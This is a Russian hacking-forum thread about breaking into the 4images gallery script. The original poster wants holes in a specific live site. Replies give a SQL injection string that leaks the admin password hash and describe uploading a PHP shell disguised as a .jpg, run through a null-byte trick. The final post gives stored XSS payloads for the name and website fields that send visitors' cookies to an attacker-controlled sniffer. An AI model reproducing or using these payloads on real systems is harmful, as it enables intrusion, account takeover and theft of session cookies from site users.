помогите с уязвимостями 4images

Discussion in 'Уязвимости' started by korrekt, 25 Jan 2006.

  1. korrekt

    korrekt New Member

    Joined:
    24 Jan 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    какие есть уязвимости у этой галереи?
     
  2. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    235
    Reputations:
    182
    Скрипт 4images 1.7.1
    Опасность критическая
    сайт производителя http://www.4homepages.de/
    если в разделе "расширенный поиск" в поле "найти юзера" ввести
    [Admin nick]' union select user_password from 4images_users where user_name LIKE '[Admin nick]

    то скрипт в ошибку выдаст зашифрованный мд5хеш админа
     
    4 people like this.
  3. korrekt

    korrekt New Member

    Joined:
    24 Jan 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    это я и так нашёл в инете и это не работает.. нужно что-то ещё..
     
  4. korrekt

    korrekt New Member

    Joined:
    24 Jan 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    вот здесь - http://forum.web-hack.ru/index.php?showtopic=32196
    мне попытались немного помочь и указали на несколько дырок, но я о этих дырках знаю и их уже закрыли на интересующем сайте-галерее. может быть кто-то ещё что-то знает?
     
  5. slime

    slime New Member

    Joined:
    8 Dec 2005
    Messages:
    30
    Likes Received:
    1
    Reputations:
    -2
    Может кто нить знает, как на залить шелл в 4images???
     
  6. nytros

    nytros New Member

    Joined:
    5 Jan 2006
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    http://ivdb.org/poc/1312.htm----->4images
     
  7. Foblas

    Foblas New Member

    Joined:
    7 Mar 2006
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    slime, смотри видео на античате, подробно описано что и как.
    Заливаешь шел с расширением jpg, при просмотре картинки добавляем символ конца сроки %00, и php скрипт выпоkyится.
     
  8. blaga

    blaga Elder - Старейшина

    Joined:
    23 Mar 2006
    Messages:
    884
    Likes Received:
    273
    Reputations:
    106
    перезаливать пробовал?
     
  9. TTyck

    TTyck Elder - Старейшина

    Joined:
    12 Nov 2005
    Messages:
    116
    Likes Received:
    41
    Reputations:
    12
    кстати, версии 1.7.1 почти все похеканы... в главноq дире лежит шелл под названием config.new.php
     
  10. blaga

    blaga Elder - Старейшина

    Joined:
    23 Mar 2006
    Messages:
    884
    Likes Received:
    273
    Reputations:
    106
    я конечно могу и ошибаться, но если там такой фильтр то мне очень кажется что никак...
     
  11. злойдядька

    Joined:
    20 Nov 2008
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    активная ХSS в полях имя и сайт.

    в поле сайт вводим http://"><img src="javascript:img=new/**/Image();img.src=String.fromCharCode(ЗДЕСЬ ССЫЛКА НА СНИФЕР ЗАКОДИРОВАНАЯ В CharCode)+document.cookie" width="0" border="0">

    при регистрации вводим имя NAME<img src="javascript:img=new/**/Image();img.src=String.fromCharCode(ЗДЕСЬ ССЫЛКА НА СНИФЕР ЗАКОДИРОВАНАЯ В CharCode)+document.cookie" width="0" border="0">

    будет отображатся ваше имя, а остальная часть будет не видна
     
    1 person likes this.
Loading...